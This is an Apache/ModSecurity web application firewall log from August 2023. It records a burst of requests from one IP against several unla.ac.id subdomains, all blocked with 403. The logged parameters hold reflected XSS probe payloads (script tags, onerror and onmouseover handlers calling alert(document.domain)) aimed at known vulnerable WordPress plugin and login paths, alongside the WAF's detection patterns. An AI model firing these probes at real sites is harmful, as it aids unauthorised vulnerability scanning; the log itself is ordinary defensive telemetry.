[Tue Aug 29 11:51:27.035103 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15T8Co-f0AAAmLPTAAAAAN"]
[Tue Aug 29 11:51:27.534728 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15T8Co-f0AAAm7m@wAAAAE"]
[Tue Aug 29 11:51:27.543427 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15T8Co-f0AAAmNp5AAAAAQ"]
[Tue Aug 29 11:51:27.595071 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAnHQekAAAAT"]
[Tue Aug 29 11:51:27.596769 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAm-MdwAAAAI"]
[Tue Aug 29 11:51:27.598924 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAm@5yUAAAAH"]
[Tue Aug 29 11:51:27.599859 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAnDFzAAAAAM"]
[Tue Aug 29 11:51:27.601596 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAjdQU4AAAAZ"]
[Tue Aug 29 11:51:27.603394 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAmNp5EAAAAQ"]
[Tue Aug 29 11:51:27.604575 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/log"] [unique_id "ZO15T8Co-f0AAAkyyFkAAAAW"]
[Tue Aug 29 11:51:28.611558 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAnHQesAAAAT"]
[Tue Aug 29 11:51:28.737622 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/login/"] [unique_id "ZO15UMCo-f0AAAmHd-UAAAAz"]
[Tue Aug 29 11:51:28.856710 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAkyyFwAAAAW"]
[Tue Aug 29 11:51:28.867554 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAmQ-x8AAAAb"]
[Tue Aug 29 11:51:28.874236 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAjdQVEAAAAZ"]
[Tue Aug 29 11:51:28.915196 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAmHd-cAAAAz"]
[Tue Aug 29 11:51:28.916351 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAjdQVIAAAAZ"]
[Tue Aug 29 11:51:28.916362 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAkr0GkAAAAC"]
[Tue Aug 29 11:51:28.917059 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAlUljQAAAA0"]
[Tue Aug 29 11:51:28.920465 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAlIBisAAAAn"]
[Tue Aug 29 11:51:28.933747 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAnDFzQAAAAM"]
[Tue Aug 29 11:51:28.936458 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAkr0GoAAAAC"]
[Tue Aug 29 11:51:28.937199 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAm80P0AAAAF"]
[Tue Aug 29 11:51:28.938501 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAmQ-yEAAAAb"]
[Tue Aug 29 11:51:28.941333 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAnTlKwAAAAA"]
[Tue Aug 29 11:51:28.945331 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAnHQe4AAAAT"]
[Tue Aug 29 11:51:29.550831 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAnB5V4AAAAJ"]
[Tue Aug 29 11:51:29.557009 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAmHd-kAAAAz"]
[Tue Aug 29 11:51:29.560355 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UcCo-f0AAAnDFzUAAAAM"]
[Tue Aug 29 11:51:29.563654 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAnHQe8AAAAT"]
[Tue Aug 29 11:51:29.567313 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAm7m-QAAAAE"]
[Tue Aug 29 11:51:29.573665 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UcCo-f0AAAm@5yoAAAAH"]
[Tue Aug 29 11:51:29.626916 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAkr0GwAAAAC"]
[Tue Aug 29 11:51:29.686655 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UcCo-f0AAAmNp5cAAAAQ"]
[Tue Aug 29 11:51:30.573379 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAmLPTsAAAAN"]
[Tue Aug 29 11:51:30.578176 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAnIlhYAAAAV"]
[Tue Aug 29 11:51:30.578252 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAmNp5gAAAAQ"]
